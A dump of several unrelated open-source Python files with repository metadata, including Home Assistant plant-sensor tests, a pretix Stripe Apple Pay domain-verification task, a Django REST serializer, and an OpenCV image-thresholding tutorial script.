from mypy_boto3_ec2.service_resource import Instance
from materialize.cli.scratch import check_required_vars
from materialize.scratch import launched_by, print_instances, tags, whoami
def configure_parser(parser: argparse.ArgumentParser) -> None:
check_required_vars()
parser.add_argument(
"who",
nargs="*",
help="Whose instances to show (defaults to yourself)",
default=[whoami()],
)
parser.add_argument("--all", help="Show all instances", action="store_true")
parser.add_argument("--output-format", choices=["table", "csv"], default="table")
def run(args: argparse.Namespace) -> None:
filter: Callable[[Instance], bool] = (
(lambda _i: True) if args.all else (lambda i: launched_by(tags(i)) in args.who)
)
ists = [i for i in boto3.resource("ec2").instances.all() if filter(i)]
print_instances(ists, args.output_format)
| true | true |
f7260a5cf2eade315c5bf110204cd445c7e662a3 | 7,966 | py | Python | tests/components/plant/test_init.py | domwillcode/home-assistant | f170c80bea70c939c098b5c88320a1c789858958 | [
"Apache-2.0"
] | 6 | 2020-07-18T16:33:25.000Z | 2021-09-26T09:52:04.000Z | tests/components/plant/test_init.py | domwillcode/home-assistant | f170c80bea70c939c098b5c88320a1c789858958 | [
"Apache-2.0"
] | 38 | 2020-07-23T07:14:17.000Z | 2022-03-31T06:01:46.000Z | tests/components/plant/test_init.py | klauern/home-assistant-core | c18ba6aec0627e6afb6442c678edb5ff2bb17db6 | [
"Apache-2.0"
] | 5 | 2020-03-29T00:29:13.000Z | 2021-09-06T20:58:40.000Z | """Unit tests for platform/plant.py."""
from datetime import datetime, timedelta
import pytest
from homeassistant.components import recorder
import homeassistant.components.plant as plant
from homeassistant.const import (
ATTR_UNIT_OF_MEASUREMENT,
CONDUCTIVITY,
STATE_OK,
STATE_PROBLEM,
STATE_UNAVAILABLE,
STATE_UNKNOWN,
)
from homeassistant.core import State
from homeassistant.setup import async_setup_component
from tests.common import init_recorder_component
GOOD_DATA = {
"moisture": 50,
"battery": 90,
"temperature": 23.4,
"conductivity": 777,
"brightness": 987,
}
BRIGHTNESS_ENTITY = "sensor.mqtt_plant_brightness"
MOISTURE_ENTITY = "sensor.mqtt_plant_moisture"
GOOD_CONFIG = {
"sensors": {
"moisture": MOISTURE_ENTITY,
"battery": "sensor.mqtt_plant_battery",
"temperature": "sensor.mqtt_plant_temperature",
"conductivity": "sensor.mqtt_plant_conductivity",
"brightness": BRIGHTNESS_ENTITY,
},
"min_moisture": 20,
"max_moisture": 60,
"min_battery": 17,
"min_conductivity": 500,
"min_temperature": 15,
"min_brightness": 500,
}
async def test_valid_data(hass):
"""Test processing valid data."""
sensor = plant.Plant("my plant", GOOD_CONFIG)
sensor.entity_id = "sensor.mqtt_plant_battery"
sensor.hass = hass
for reading, value in GOOD_DATA.items():
sensor.state_changed(
GOOD_CONFIG["sensors"][reading],
None,
State(GOOD_CONFIG["sensors"][reading], value),
)
assert sensor.state == "ok"
attrib = sensor.state_attributes
for reading, value in GOOD_DATA.items():
# battery level has a different name in
# the JSON format than in hass
assert attrib[reading] == value
async def test_low_battery(hass):
"""Test processing with low battery data and limit set."""
sensor = plant.Plant("other plant", GOOD_CONFIG)
sensor.entity_id = "sensor.mqtt_plant_battery"
sensor.hass = hass
assert sensor.state_attributes["problem"] == "none"
sensor.state_changed(
"sensor.mqtt_plant_battery",
State("sensor.mqtt_plant_battery", 45),
State("sensor.mqtt_plant_battery", 10),
)
assert sensor.state == "problem"
assert sensor.state_attributes["problem"] == "battery low"
async def test_initial_states(hass):
"""Test plant initialises attributes if sensor already exists."""
hass.states.async_set(MOISTURE_ENTITY, 5, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY})
plant_name = "some_plant"
assert await async_setup_component(
hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
)
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert 5 == state.attributes[plant.READING_MOISTURE]
async def test_update_states(hass):
"""Test updating the state of a sensor.
Make sure that plant processes this correctly.
"""
plant_name = "some_plant"
assert await async_setup_component(
hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
)
hass.states.async_set(MOISTURE_ENTITY, 5, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY})
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert STATE_PROBLEM == state.state
assert 5 == state.attributes[plant.READING_MOISTURE]
async def test_unavailable_state(hass):
"""Test updating the state with unavailable.
Make sure that plant processes this correctly.
"""
plant_name = "some_plant"
assert await async_setup_component(
hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
)
hass.states.async_set(
MOISTURE_ENTITY, STATE_UNAVAILABLE, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY}
)
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert state.state == STATE_PROBLEM
assert state.attributes[plant.READING_MOISTURE] == STATE_UNAVAILABLE
async def test_state_problem_if_unavailable(hass):
"""Test updating the state with unavailable after setting it to valid value.
Make sure that plant processes this correctly.
"""
plant_name = "some_plant"
assert await async_setup_component(
hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
)
hass.states.async_set(MOISTURE_ENTITY, 42, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY})
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert state.state == STATE_OK
assert state.attributes[plant.READING_MOISTURE] == 42
hass.states.async_set(
MOISTURE_ENTITY, STATE_UNAVAILABLE, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY}
)
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert state.state == STATE_PROBLEM
assert state.attributes[plant.READING_MOISTURE] == STATE_UNAVAILABLE
@pytest.mark.skipif(
plant.ENABLE_LOAD_HISTORY is False,
reason="tests for loading from DB are unstable, thus"
"this feature is turned of until tests become"
"stable",
)
async def test_load_from_db(hass):
"""Test bootstrapping the brightness history from the database.
This test can should only be executed if the loading of the history
is enabled via plant.ENABLE_LOAD_HISTORY.
"""
init_recorder_component(hass)
plant_name = "wise_plant"
for value in [20, 30, 10]:
hass.states.async_set(
BRIGHTNESS_ENTITY, value, {ATTR_UNIT_OF_MEASUREMENT: "Lux"}
)
await hass.async_block_till_done()
# wait for the recorder to really store the data
hass.data[recorder.DATA_INSTANCE].block_till_done()
assert await async_setup_component(
hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
)
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert STATE_UNKNOWN == state.state
max_brightness = state.attributes.get(plant.ATTR_MAX_BRIGHTNESS_HISTORY)
assert 30 == max_brightness
async def test_brightness_history(hass):
"""Test the min_brightness check."""
plant_name = "some_plant"
assert await async_setup_component(
hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
)
hass.states.async_set(BRIGHTNESS_ENTITY, 100, {ATTR_UNIT_OF_MEASUREMENT: "lux"})
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert STATE_PROBLEM == state.state
hass.states.async_set(BRIGHTNESS_ENTITY, 600, {ATTR_UNIT_OF_MEASUREMENT: "lux"})
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert STATE_OK == state.state
hass.states.async_set(BRIGHTNESS_ENTITY, 100, {ATTR_UNIT_OF_MEASUREMENT: "lux"})
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert STATE_OK == state.state
def test_daily_history_no_data(hass):
"""Test with empty history."""
dh = plant.DailyHistory(3)
assert dh.max is None
def test_daily_history_one_day(hass):
"""Test storing data for the same day."""
dh = plant.DailyHistory(3)
values = [-2, 10, 0, 5, 20]
for i in range(len(values)):
dh.add_measurement(values[i])
max_value = max(values[0 : i + 1])
assert 1 == len(dh._days)
assert dh.max == max_value
def test_daily_history_multiple_days(hass):
"""Test storing data for different days."""
dh = plant.DailyHistory(3)
today = datetime.now()
today_minus_1 = today - timedelta(days=1)
today_minus_2 = today_minus_1 - timedelta(days=1)
today_minus_3 = today_minus_2 - timedelta(days=1)
days = [today_minus_3, today_minus_2, today_minus_1, today]
values = [10, 1, 7, 3]
max_values = [10, 10, 10, 7]
for i in range(len(days)):
dh.add_measurement(values[i], days[i])
assert max_values[i] == dh.max
| 33.330544 | 88 | 0.700603 | from datetime import datetime, timedelta
import pytest
from homeassistant.components import recorder
import homeassistant.components.plant as plant
from homeassistant.const import (
ATTR_UNIT_OF_MEASUREMENT,
CONDUCTIVITY,
STATE_OK,
STATE_PROBLEM,
STATE_UNAVAILABLE,
STATE_UNKNOWN,
)
from homeassistant.core import State
from homeassistant.setup import async_setup_component
from tests.common import init_recorder_component
GOOD_DATA = {
"moisture": 50,
"battery": 90,
"temperature": 23.4,
"conductivity": 777,
"brightness": 987,
}
BRIGHTNESS_ENTITY = "sensor.mqtt_plant_brightness"
MOISTURE_ENTITY = "sensor.mqtt_plant_moisture"
GOOD_CONFIG = {
"sensors": {
"moisture": MOISTURE_ENTITY,
"battery": "sensor.mqtt_plant_battery",
"temperature": "sensor.mqtt_plant_temperature",
"conductivity": "sensor.mqtt_plant_conductivity",
"brightness": BRIGHTNESS_ENTITY,
},
"min_moisture": 20,
"max_moisture": 60,
"min_battery": 17,
"min_conductivity": 500,
"min_temperature": 15,
"min_brightness": 500,
}
async def test_valid_data(hass):
sensor = plant.Plant("my plant", GOOD_CONFIG)
sensor.entity_id = "sensor.mqtt_plant_battery"
sensor.hass = hass
for reading, value in GOOD_DATA.items():
sensor.state_changed(
GOOD_CONFIG["sensors"][reading],
None,
State(GOOD_CONFIG["sensors"][reading], value),
)
assert sensor.state == "ok"
attrib = sensor.state_attributes
for reading, value in GOOD_DATA.items():
assert attrib[reading] == value
async def test_low_battery(hass):
sensor = plant.Plant("other plant", GOOD_CONFIG)
sensor.entity_id = "sensor.mqtt_plant_battery"
sensor.hass = hass
assert sensor.state_attributes["problem"] == "none"
sensor.state_changed(
"sensor.mqtt_plant_battery",
State("sensor.mqtt_plant_battery", 45),
State("sensor.mqtt_plant_battery", 10),
)
assert sensor.state == "problem"
assert sensor.state_attributes["problem"] == "battery low"
async def test_initial_states(hass):
hass.states.async_set(MOISTURE_ENTITY, 5, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY})
plant_name = "some_plant"
assert await async_setup_component(
hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
)
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert 5 == state.attributes[plant.READING_MOISTURE]
async def test_update_states(hass):
plant_name = "some_plant"
assert await async_setup_component(
hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
)
hass.states.async_set(MOISTURE_ENTITY, 5, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY})
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert STATE_PROBLEM == state.state
assert 5 == state.attributes[plant.READING_MOISTURE]
async def test_unavailable_state(hass):
plant_name = "some_plant"
assert await async_setup_component(
hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
)
hass.states.async_set(
MOISTURE_ENTITY, STATE_UNAVAILABLE, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY}
)
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert state.state == STATE_PROBLEM
assert state.attributes[plant.READING_MOISTURE] == STATE_UNAVAILABLE
async def test_state_problem_if_unavailable(hass):
plant_name = "some_plant"
assert await async_setup_component(
hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
)
hass.states.async_set(MOISTURE_ENTITY, 42, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY})
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert state.state == STATE_OK
assert state.attributes[plant.READING_MOISTURE] == 42
hass.states.async_set(
MOISTURE_ENTITY, STATE_UNAVAILABLE, {ATTR_UNIT_OF_MEASUREMENT: CONDUCTIVITY}
)
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert state.state == STATE_PROBLEM
assert state.attributes[plant.READING_MOISTURE] == STATE_UNAVAILABLE
@pytest.mark.skipif(
plant.ENABLE_LOAD_HISTORY is False,
reason="tests for loading from DB are unstable, thus"
"this feature is turned of until tests become"
"stable",
)
async def test_load_from_db(hass):
init_recorder_component(hass)
plant_name = "wise_plant"
for value in [20, 30, 10]:
hass.states.async_set(
BRIGHTNESS_ENTITY, value, {ATTR_UNIT_OF_MEASUREMENT: "Lux"}
)
await hass.async_block_till_done()
hass.data[recorder.DATA_INSTANCE].block_till_done()
assert await async_setup_component(
hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
)
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert STATE_UNKNOWN == state.state
max_brightness = state.attributes.get(plant.ATTR_MAX_BRIGHTNESS_HISTORY)
assert 30 == max_brightness
async def test_brightness_history(hass):
plant_name = "some_plant"
assert await async_setup_component(
hass, plant.DOMAIN, {plant.DOMAIN: {plant_name: GOOD_CONFIG}}
)
hass.states.async_set(BRIGHTNESS_ENTITY, 100, {ATTR_UNIT_OF_MEASUREMENT: "lux"})
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert STATE_PROBLEM == state.state
hass.states.async_set(BRIGHTNESS_ENTITY, 600, {ATTR_UNIT_OF_MEASUREMENT: "lux"})
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert STATE_OK == state.state
hass.states.async_set(BRIGHTNESS_ENTITY, 100, {ATTR_UNIT_OF_MEASUREMENT: "lux"})
await hass.async_block_till_done()
state = hass.states.get(f"plant.{plant_name}")
assert STATE_OK == state.state
def test_daily_history_no_data(hass):
dh = plant.DailyHistory(3)
assert dh.max is None
def test_daily_history_one_day(hass):
dh = plant.DailyHistory(3)
values = [-2, 10, 0, 5, 20]
for i in range(len(values)):
dh.add_measurement(values[i])
max_value = max(values[0 : i + 1])
assert 1 == len(dh._days)
assert dh.max == max_value
def test_daily_history_multiple_days(hass):
dh = plant.DailyHistory(3)
today = datetime.now()
today_minus_1 = today - timedelta(days=1)
today_minus_2 = today_minus_1 - timedelta(days=1)
today_minus_3 = today_minus_2 - timedelta(days=1)
days = [today_minus_3, today_minus_2, today_minus_1, today]
values = [10, 1, 7, 3]
max_values = [10, 10, 10, 7]
for i in range(len(days)):
dh.add_measurement(values[i], days[i])
assert max_values[i] == dh.max
| true | true |
f7260c42d605bb593528b63732665c5cf39180b2 | 59 | py | Python | core/python/spirit/parameters/__init__.py | SpiritSuperUser/spirit | fbe69c2a9b7a73e8f47d302c619303aea2a22ace | [
"MIT"
] | 2 | 2020-11-12T13:54:22.000Z | 2021-11-05T09:10:27.000Z | core/python/spirit/parameters/__init__.py | SpiritSuperUser/spirit | fbe69c2a9b7a73e8f47d302c619303aea2a22ace | [
"MIT"
] | null | null | null | core/python/spirit/parameters/__init__.py | SpiritSuperUser/spirit | fbe69c2a9b7a73e8f47d302c619303aea2a22ace | [
"MIT"
] | null | null | null | __all__ = ["gneb", "llg"]
from spirit.parameters import *
| 14.75 | 31 | 0.677966 | __all__ = ["gneb", "llg"]
from spirit.parameters import *
| true | true |
f7260dbc831f7d79b0b85a4ce2ff386597e672d5 | 226 | py | Python | src/robust_deid/sequence_tagging/dataset_builder/__init__.py | obi-ml-public/ehr_deidentification | c9deaf30b8317689d28a4267d15ec13baa9791cd | [
"MIT"
] | null | null | null | src/robust_deid/sequence_tagging/dataset_builder/__init__.py | obi-ml-public/ehr_deidentification | c9deaf30b8317689d28a4267d15ec13baa9791cd | [
"MIT"
] | null | null | null | src/robust_deid/sequence_tagging/dataset_builder/__init__.py | obi-ml-public/ehr_deidentification | c9deaf30b8317689d28a4267d15ec13baa9791cd | [
"MIT"
] | null | null | null | from .ner_labels import NERLabels
from .ner_dataset import NERDataset
from .label_mapper import LabelMapper
from .dataset_tokenizer import DatasetTokenizer
__all__=["NERLabels", "NERDataset", "LabelMapper", "DatasetTokenizer"] | 45.2 | 70 | 0.836283 | from .ner_labels import NERLabels
from .ner_dataset import NERDataset
from .label_mapper import LabelMapper
from .dataset_tokenizer import DatasetTokenizer
__all__=["NERLabels", "NERDataset", "LabelMapper", "DatasetTokenizer"] | true | true |
f7260dee0491f9cc625cee893dce44cee0a86ee8 | 1,461 | py | Python | src/pretix/plugins/stripe/tasks.py | NicsTr/pretix | e6d2380d9ed1836cc64a688b2be20d00a8500eab | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2020-04-25T00:11:00.000Z | 2020-04-25T00:11:00.000Z | src/pretix/plugins/stripe/tasks.py | NicsTr/pretix | e6d2380d9ed1836cc64a688b2be20d00a8500eab | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/pretix/plugins/stripe/tasks.py | NicsTr/pretix | e6d2380d9ed1836cc64a688b2be20d00a8500eab | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | import logging
from urllib.parse import urlsplit
import stripe
from django.conf import settings
from pretix.base.services.tasks import EventTask
from pretix.celery_app import app
from pretix.multidomain.urlreverse import get_event_domain
from pretix.plugins.stripe.models import RegisteredApplePayDomain
logger = logging.getLogger(__name__)
def get_domain_for_event(event):
domain = get_event_domain(event, fallback=True)
if not domain:
siteurlsplit = urlsplit(settings.SITE_URL)
return siteurlsplit.hostname
return domain
def get_stripe_account_key(prov):
if prov.settings.connect_user_id:
return prov.settings.connect_user_id
else:
return prov.settings.publishable_key
@app.task(base=EventTask, max_retries=5, default_retry_delay=1)
def stripe_verify_domain(event, domain):
from pretix.plugins.stripe.payment import StripeCC
prov = StripeCC(event)
account = get_stripe_account_key(prov)
if RegisteredApplePayDomain.objects.filter(account=account, domain=domain).exists():
return
try:
resp = stripe.ApplePayDomain.create(
domain_name=domain,
**prov.api_kwargs
)
except stripe.error.StripeError:
logger.exception('Could not verify domain with Stripe')
else:
if resp.livemode:
RegisteredApplePayDomain.objects.create(
domain=domain,
account=account
)
| 28.096154 | 88 | 0.718686 | import logging
from urllib.parse import urlsplit
import stripe
from django.conf import settings
from pretix.base.services.tasks import EventTask
from pretix.celery_app import app
from pretix.multidomain.urlreverse import get_event_domain
from pretix.plugins.stripe.models import RegisteredApplePayDomain
logger = logging.getLogger(__name__)
def get_domain_for_event(event):
domain = get_event_domain(event, fallback=True)
if not domain:
siteurlsplit = urlsplit(settings.SITE_URL)
return siteurlsplit.hostname
return domain
def get_stripe_account_key(prov):
if prov.settings.connect_user_id:
return prov.settings.connect_user_id
else:
return prov.settings.publishable_key
@app.task(base=EventTask, max_retries=5, default_retry_delay=1)
def stripe_verify_domain(event, domain):
from pretix.plugins.stripe.payment import StripeCC
prov = StripeCC(event)
account = get_stripe_account_key(prov)
if RegisteredApplePayDomain.objects.filter(account=account, domain=domain).exists():
return
try:
resp = stripe.ApplePayDomain.create(
domain_name=domain,
**prov.api_kwargs
)
except stripe.error.StripeError:
logger.exception('Could not verify domain with Stripe')
else:
if resp.livemode:
RegisteredApplePayDomain.objects.create(
domain=domain,
account=account
)
| true | true |
f7260ece4a1e3fc3b43d89b2b456333299b82c9d | 2,817 | py | Python | Q/questionnaire/serializers/serializers_ontologies.py | ES-DOC/esdoc-questionnaire | 9301eda375c4046323265b37ba96d94c94bf8b11 | [
"MIT"
] | null | null | null | Q/questionnaire/serializers/serializers_ontologies.py | ES-DOC/esdoc-questionnaire | 9301eda375c4046323265b37ba96d94c94bf8b11 | [
"MIT"
] | 477 | 2015-01-07T18:22:27.000Z | 2017-07-17T15:05:48.000Z | Q/questionnaire/serializers/serializers_ontologies.py | ES-DOC/esdoc-questionnaire | 9301eda375c4046323265b37ba96d94c94bf8b11 | [
"MIT"
] | null | null | null | ####################
# ES-DOC CIM Questionnaire
# Copyright (c) 2017 ES-DOC. All rights reserved.
#
# University of Colorado, Boulder
# http://cires.colorado.edu/
#
# This project is distributed according to the terms of the MIT license [http://www.opensource.org/licenses/MIT].
####################
from django.core.exceptions import ValidationError as DjangoValidationError
from rest_framework.exceptions import ValidationError as RestValidationError
from rest_framework import serializers
from uuid import UUID as generate_uuid
from Q.questionnaire.serializers.serializers_base import QListSerializer, QSerializer, QVersionSerializerField
from Q.questionnaire.models.models_ontologies import QOntology
from Q.questionnaire.q_utils import serialize_model_to_dict
from Q.questionnaire.q_constants import *
class QOntologySerializer(QSerializer):
class Meta:
model = QOntology
fields = (
'id',
'name',
'version',
'documentation',
'file',
'title',
"url",
'created',
'modified',
'ontology_type',
'is_registered',
'is_active',
'key',
'document_types',
)
# there is no need to explicitly add QUniqueTogetherValidator
# b/c that is done automatically in "QSerializer.get_unique_together_validators()"
# validators = [
# QUniqueTogetherValidator(
# queryset=QModelCustomization.objects.all(),
# # fields=('name', 'version'),
# )
# ]
version = QVersionSerializerField()
title = serializers.SerializerMethodField() # method_name="get_title"
document_types = serializers.SerializerMethodField(method_name="get_supported_document_types")
def get_title(self, obj):
return str(obj)
def get_supported_document_types(self, obj):
"""
returns the model_proxies of the current ontology that can be used to create documents
ie: those w/ the stereotype "document" and that are listed in SUPPORTED_DOCUMENTS
:param obj:
:return:
"""
supported_document_model_proxies = obj.model_proxies.filter(
is_document=True,
name__iregex=r'(' + '|'.join(["^{0}$".format(sd) for sd in SUPPORTED_DOCUMENTS["CIM2"]]) + ')',
).order_by("name")
return [
serialize_model_to_dict(
model_proxy,
include={
"title": str(model_proxy),
"name": model_proxy.name.lower()
},
exclude=["guid", "created", "modified", "ontology"]
)
for model_proxy in supported_document_model_proxies
]
| 34.777778 | 115 | 0.611999 | .models_ontologies import QOntology
from Q.questionnaire.q_utils import serialize_model_to_dict
from Q.questionnaire.q_constants import *
class QOntologySerializer(QSerializer):
class Meta:
model = QOntology
fields = (
'id',
'name',
'version',
'documentation',
'file',
'title',
"url",
'created',
'modified',
'ontology_type',
'is_registered',
'is_active',
'key',
'document_types',
)
on = QVersionSerializerField()
title = serializers.SerializerMethodField()
document_types = serializers.SerializerMethodField(method_name="get_supported_document_types")
def get_title(self, obj):
return str(obj)
def get_supported_document_types(self, obj):
supported_document_model_proxies = obj.model_proxies.filter(
is_document=True,
name__iregex=r'(' + '|'.join(["^{0}$".format(sd) for sd in SUPPORTED_DOCUMENTS["CIM2"]]) + ')',
).order_by("name")
return [
serialize_model_to_dict(
model_proxy,
include={
"title": str(model_proxy),
"name": model_proxy.name.lower()
},
exclude=["guid", "created", "modified", "ontology"]
)
for model_proxy in supported_document_model_proxies
]
| true | true |
f726102b761a9e6adbb75d3300ca03971c3cffb7 | 533 | py | Python | app/util.py | mkhumtai/6CCS3PRJ | c7d5bedf9529f6e2b7a57e102761716c11f961c8 | [
"MIT"
] | null | null | null | app/util.py | mkhumtai/6CCS3PRJ | c7d5bedf9529f6e2b7a57e102761716c11f961c8 | [
"MIT"
] | null | null | null | app/util.py | mkhumtai/6CCS3PRJ | c7d5bedf9529f6e2b7a57e102761716c11f961c8 | [
"MIT"
] | null | null | null | # -*- encoding: utf-8 -*-
"""
Flask Boilerplate
Author: AppSeed.us - App Generator
"""
from flask import json
from app import app, db
from .common import *
# build a Json response
def response(data):
return app.response_class(response=json.dumps(data),
status=200,
mimetype='application/json')
def g_db_commit():
db.session.commit()
def g_db_add(obj):
if obj:
db.session.add(obj)
def g_db_del(obj):
if obj:
db.session.delete(obj)
| 16.65625 | 58 | 0.594747 |
from flask import json
from app import app, db
from .common import *
def response(data):
return app.response_class(response=json.dumps(data),
status=200,
mimetype='application/json')
def g_db_commit():
db.session.commit()
def g_db_add(obj):
if obj:
db.session.add(obj)
def g_db_del(obj):
if obj:
db.session.delete(obj)
| true | true |
f726102cba78d004ea78e8999b8ab8ecc337e74b | 968 | py | Python | arm_prosthesis/models/gesture.py | paulrozhkin/arm_prosthesis_raspberry | a643dc84109f1d516fa2ca50414f95f408d6da7d | [
"MIT"
] | 2 | 2021-11-08T01:52:36.000Z | 2021-11-08T01:52:38.000Z | arm_prosthesis/models/gesture.py | paulrozhkin/arm_prosthesis_raspberry | a643dc84109f1d516fa2ca50414f95f408d6da7d | [
"MIT"
] | null | null | null | arm_prosthesis/models/gesture.py | paulrozhkin/arm_prosthesis_raspberry | a643dc84109f1d516fa2ca50414f95f408d6da7d | [
"MIT"
] | 1 | 2020-11-08T16:45:23.000Z | 2020-11-08T16:45:23.000Z | from typing import List
from arm_prosthesis.models.gesture_action import GestureAction
class Gesture:
def __init__(self, uuid: str, name: str, last_time_sync: int, iterable: bool, repetitions: int,
actions: List[GestureAction]):
self._uuid = uuid
self._name = name
self._last_time_sync = last_time_sync
self._iterable = iterable
self._repetitions = repetitions
self._actions = actions
@property
def uuid(self) -> str:
return self._uuid
@property
def name(self) -> str:
return self._name
@property
def last_time_sync(self) -> int:
return self._last_time_sync
@property
def iterable(self) -> bool:
return self._iterable
@property
def repetitions(self) -> int:
return self._repetitions
@property
def actions(self) -> List[GestureAction]:
return self._actions
| 24.820513 | 100 | 0.615702 | from typing import List
from arm_prosthesis.models.gesture_action import GestureAction
class Gesture:
def __init__(self, uuid: str, name: str, last_time_sync: int, iterable: bool, repetitions: int,
actions: List[GestureAction]):
self._uuid = uuid
self._name = name
self._last_time_sync = last_time_sync
self._iterable = iterable
self._repetitions = repetitions
self._actions = actions
@property
def uuid(self) -> str:
return self._uuid
@property
def name(self) -> str:
return self._name
@property
def last_time_sync(self) -> int:
return self._last_time_sync
@property
def iterable(self) -> bool:
return self._iterable
@property
def repetitions(self) -> int:
return self._repetitions
@property
def actions(self) -> List[GestureAction]:
return self._actions
| true | true |
f726106467d8fad1a2a9e799965ebffea0070438 | 2,395 | py | Python | image-manipulation-processing/thresholding.py | mozbatman/Basic-Opencv-Example | e00aab203064e3e0f225c6aa062997aabe05ccdb | [
"MIT"
] | null | null | null | image-manipulation-processing/thresholding.py | mozbatman/Basic-Opencv-Example | e00aab203064e3e0f225c6aa062997aabe05ccdb | [
"MIT"
] | null | null | null | image-manipulation-processing/thresholding.py | mozbatman/Basic-Opencv-Example | e00aab203064e3e0f225c6aa062997aabe05ccdb | [
"MIT"
] | null | null | null | ## Thresholding = Giriş olarak verilen görüntüyü ikili görüntüye çevirmek için kullanılan bir yöntemdir. İkili görüntü (binary), görüntünün siyah ve beyaz olarak tanımlanmasıdır.
# Morfolojik operatörler gibi görüntü üzerindeki gürültüleri azaltmak veya nesne belirlemek gibi farklı amaçlar için kullanılır.
import cv2
import numpy as np
# Load our image as greyscale
image = cv2.imread('../images/gradient.jpg',0)
cv2.imshow('Original', image)
# Values below 127 goes to 0 (black, everything above goes to 255 (white)
ret,thresh1 = cv2.threshold(image, 127, 255, cv2.THRESH_BINARY)
cv2.imshow('1 Threshold Binary', thresh1)
# Values below 127 go to 255 and values above 127 go to 0 (reverse of above)
ret,thresh2 = cv2.threshold(image, 127, 255, cv2.THRESH_BINARY_INV)
cv2.imshow('2 Threshold Binary Inverse', thresh2)
# Values above 127 are truncated (held) at 127 (the 255 argument is unused)
ret,thresh3 = cv2.threshold(image, 127, 255, cv2.THRESH_TRUNC)
cv2.imshow('3 THRESH TRUNC', thresh3)
# Values below 127 go to 0, above 127 are unchanged
ret,thresh4 = cv2.threshold(image, 127, 255, cv2.THRESH_TOZERO)
cv2.imshow('4 THRESH TOZERO', thresh4)
# Resever of above, below 127 is unchanged, above 127 goes to 0
ret,thresh5 = cv2.threshold(image, 127, 255, cv2.THRESH_TOZERO_INV)
cv2.imshow('5 THRESH TOZERO INV', thresh5)
cv2.waitKey(0)
cv2.destroyAllWindows()
image = cv2.imread('../images/Origin_of_Species.jpg', 0)
cv2.imshow('Original', image)
cv2.waitKey(0)
# Values below 127 goes to 0 (black, everything above goes to 255 (white)
ret,thresh1 = cv2.threshold(image, 127, 255, cv2.THRESH_BINARY)
cv2.imshow('Threshold Binary', thresh1)
cv2.waitKey(0)
# It's good practice to blur images as it removes noise
image = cv2.GaussianBlur(image, (3, 3), 0)
# Using adaptiveThreshold
thresh = cv2.adaptiveThreshold(image, 255, cv2.ADAPTIVE_THRESH_MEAN_C,
cv2.THRESH_BINARY, 3, 5)
cv2.imshow("Adaptive Mean Thresholding", thresh)
cv2.waitKey(0)
_, th2 = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
cv2.imshow("Otsu's Thresholding", thresh)
cv2.waitKey(0)
# Otsu's thresholding after Gaussian filtering
blur = cv2.GaussianBlur(image, (5,5), 0)
_, th3 = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
cv2.imshow("Guassian Otsu's Thresholding", thresh)
cv2.waitKey(0)
cv2.destroyAllWindows() | 38.015873 | 179 | 0.746555 | cv2.imshow('1 Threshold Binary', thresh1)
ret,thresh2 = cv2.threshold(image, 127, 255, cv2.THRESH_BINARY_INV)
cv2.imshow('2 Threshold Binary Inverse', thresh2)
ret,thresh3 = cv2.threshold(image, 127, 255, cv2.THRESH_TRUNC)
cv2.imshow('3 THRESH TRUNC', thresh3)
ret,thresh4 = cv2.threshold(image, 127, 255, cv2.THRESH_TOZERO)
cv2.imshow('4 THRESH TOZERO', thresh4)
ret,thresh5 = cv2.threshold(image, 127, 255, cv2.THRESH_TOZERO_INV)
cv2.imshow('5 THRESH TOZERO INV', thresh5)
cv2.waitKey(0)
cv2.destroyAllWindows()
image = cv2.imread('../images/Origin_of_Species.jpg', 0)
cv2.imshow('Original', image)
cv2.waitKey(0)
ret,thresh1 = cv2.threshold(image, 127, 255, cv2.THRESH_BINARY)
cv2.imshow('Threshold Binary', thresh1)
cv2.waitKey(0)
image = cv2.GaussianBlur(image, (3, 3), 0)
# Using adaptiveThreshold
